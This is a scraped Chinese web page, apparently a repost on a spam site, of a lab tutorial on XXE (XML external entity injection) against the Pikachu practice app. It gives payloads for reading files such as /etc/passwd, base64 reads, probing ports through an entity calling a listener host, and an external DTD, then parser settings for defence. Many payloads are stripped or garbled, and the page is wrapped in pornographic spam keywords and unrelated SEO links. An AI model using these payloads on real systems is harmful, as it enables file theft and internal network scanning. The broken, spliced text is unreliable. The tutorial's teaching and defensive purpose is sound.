中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁 > news >正文

南通公司建站模板百度號(hào)碼認(rèn)證申訴平臺(tái)

南通公司建站模板,百度號(hào)碼認(rèn)證申訴平臺(tái),斗門區(qū)建設(shè)局網(wǎng)站,dw網(wǎng)頁制作怎么設(shè)置背景顏色文章目錄 一、漏洞原理二、驗(yàn)證payload三、沒有回顯時(shí)的驗(yàn)證四、漏洞特征五、讀取文件六、Base64加密讀取七、端口檢測八、使用php檢測端口九、dtd外部實(shí)體讀取文件十、Xxe漏洞防御 一、漏洞原理 (1)XXE漏洞全稱XML External Entity Injection,即xmI外部實(shí)體注入漏…

文章目錄

  • 一、漏洞原理
  • 二、驗(yàn)證payload
  • 三、沒有回顯時(shí)的驗(yàn)證
  • 四、漏洞特征
  • 五、讀取文件
  • 六、Base64加密讀取
  • 七、端口檢測
  • 八、使用php檢測端口
  • 九、dtd外部實(shí)體讀取文件
  • 十、Xxe漏洞防御

一、漏洞原理

(1)XXE漏洞全稱XML External Entity Injection,即xmI外部實(shí)體注入漏洞, XXE漏洞發(fā)生在應(yīng)用程序解析XML輸入時(shí),沒有禁止外部實(shí)體的加載,導(dǎo)致可加載惡意外部文件,造成文件讀取、命令執(zhí)行、內(nèi)網(wǎng)端口掃描、攻擊內(nèi)網(wǎng)網(wǎng)站、發(fā)起dos攻擊等危害,XML(也是一種語言)被設(shè)計(jì)用來傳輸和存儲(chǔ)數(shù)據(jù)
(2)也就是說服務(wù)端接收和解析了來自用戶端的xml數(shù)據(jù),而又沒有做嚴(yán)格的安全控制,從而導(dǎo)致漏洞
實(shí)驗(yàn)環(huán)境:windows pikachu xxe漏洞

二、驗(yàn)證payload

<?xml version = "1.0"?>

]>
&hacker;
在這里插入圖片描述

三、沒有回顯時(shí)的驗(yàn)證

<?xml version = "1.0"?>

]>
&xxe;
在這里插入圖片描述

四、漏洞特征

Accept里有application/xml的格式
在這里插入圖片描述

五、讀取文件

<?xml version = "1.0"?> ]> &f;

在這里插入圖片描述

六、Base64加密讀取

<?xml version = "1.0"?> ]> &f;

在這里插入圖片描述
在這里插入圖片描述

或則讀取linux的/etc/passwd

<?xml version = "1.0"?> ]> &f;

七、端口檢測

ncat -lvp 4000(端口可自定義)
使用以下語句嘗試是否能夠建立連接

<?xml version = "1.0"?> <!ENTITY xxe SYSTEM "http://192.168.198.2:4000/">

]>&xxe;
如果能夠建立連接,那么服務(wù)器端的ncat會(huì)收到相應(yīng)的請(qǐng)求信息。
在這里插入圖片描述

八、使用php檢測端口

<?php $xml=<<

]>
&xxe;
EOF;
d a t a = s i m p l e x m l l o a d s t r i n g ( data=simplexml_load_string( data=simplexmll?oads?tring(xml);
print_r($data);
?>
端口關(guān)閉的情況如下
在這里插入圖片描述

開啟時(shí)
在這里插入圖片描述

九、dtd外部實(shí)體讀取文件

<?xml version="1.0"?><!DOCTYPE note

[<!ENTITY % d SYSTEM "http://127.0.0.1/note.dtd">%d;]>
&eviltest;

在這里插入圖片描述

十、Xxe漏洞防御

1、使用開發(fā)語言提供的禁用外部實(shí)體的方法
1.PHP:
libxml_disable_entity_loader(true);
2.JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
3.Python:
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

http://www.risenshineclean.com/news/27474.html

相關(guān)文章:

  • 外貿(mào)網(wǎng)站建設(shè)價(jià)格應(yīng)用商店aso優(yōu)化
  • 市委辦公廳網(wǎng)站 做合格黨辦人推廣策劃方案模板
  • 深圳政府在線網(wǎng)站石家莊網(wǎng)絡(luò)seo推廣
  • 群暉套件wordpressseo優(yōu)化教程視頻
  • 便宜做網(wǎng)站灰色行業(yè)推廣平臺(tái)網(wǎng)站
  • 網(wǎng)站模板怎么做有沒有免費(fèi)的廣告平臺(tái)
  • 北京做網(wǎng)站的軟文街怎么樣
  • 做電子商務(wù)網(wǎng)站需要什么軟件seo標(biāo)題優(yōu)化褲子關(guān)鍵詞
  • 電子商務(wù)網(wǎng)站規(guī)劃的原則是什么專門做排名的軟件
  • wp網(wǎng)站源碼百度最新財(cái)報(bào)
  • 網(wǎng)站制作論文題目網(wǎng)絡(luò)營銷師主要做什么
  • 怎樣制作自己的網(wǎng)站網(wǎng)頁游戲推廣平臺(tái)
  • 百容千域可以免費(fèi)做網(wǎng)站嗎上海廣告公司
  • 機(jī)械門戶網(wǎng)站建設(shè)特點(diǎn)市場營銷推廣策劃
  • 百度收錄網(wǎng)站怎么更改關(guān)鍵詞長沙網(wǎng)站優(yōu)化指導(dǎo)
  • 有什么做任務(wù)的網(wǎng)站嗎網(wǎng)絡(luò)營銷有哪些模式
  • 企業(yè)汽車網(wǎng)站建設(shè)關(guān)鍵詞優(yōu)化難度查詢
  • 韓國女足還能出線嗎愛站seo綜合查詢
  • 做網(wǎng)站的公司叫什么名字國際新聞最新消息戰(zhàn)爭
  • 專業(yè)網(wǎng)站開發(fā)公司免費(fèi)發(fā)布推廣的平臺(tái)有哪些
  • 企業(yè)網(wǎng)站 .net正規(guī)考證培訓(xùn)機(jī)構(gòu)
  • 開發(fā)公司總工崗位職責(zé)網(wǎng)站優(yōu)化策略分析
  • 無錫微網(wǎng)站開發(fā)方象科技服務(wù)案例
  • 作品集用什么網(wǎng)站做模板建站難嗎
  • 網(wǎng)站建設(shè)需求怎么寫河北百度推廣客服電話
  • 可以注冊(cè)郵箱的網(wǎng)站今天微博熱搜前十名
  • 網(wǎng)站開發(fā)語言怎么看中國國際新聞
  • 網(wǎng)頁版微信二維碼怎么生成seo網(wǎng)站關(guān)鍵詞優(yōu)化方法
  • 網(wǎng)站的注冊(cè)頁面怎么做黃頁88網(wǎng)
  • 國內(nèi)外優(yōu)秀設(shè)計(jì)網(wǎng)站營銷網(wǎng)站搭建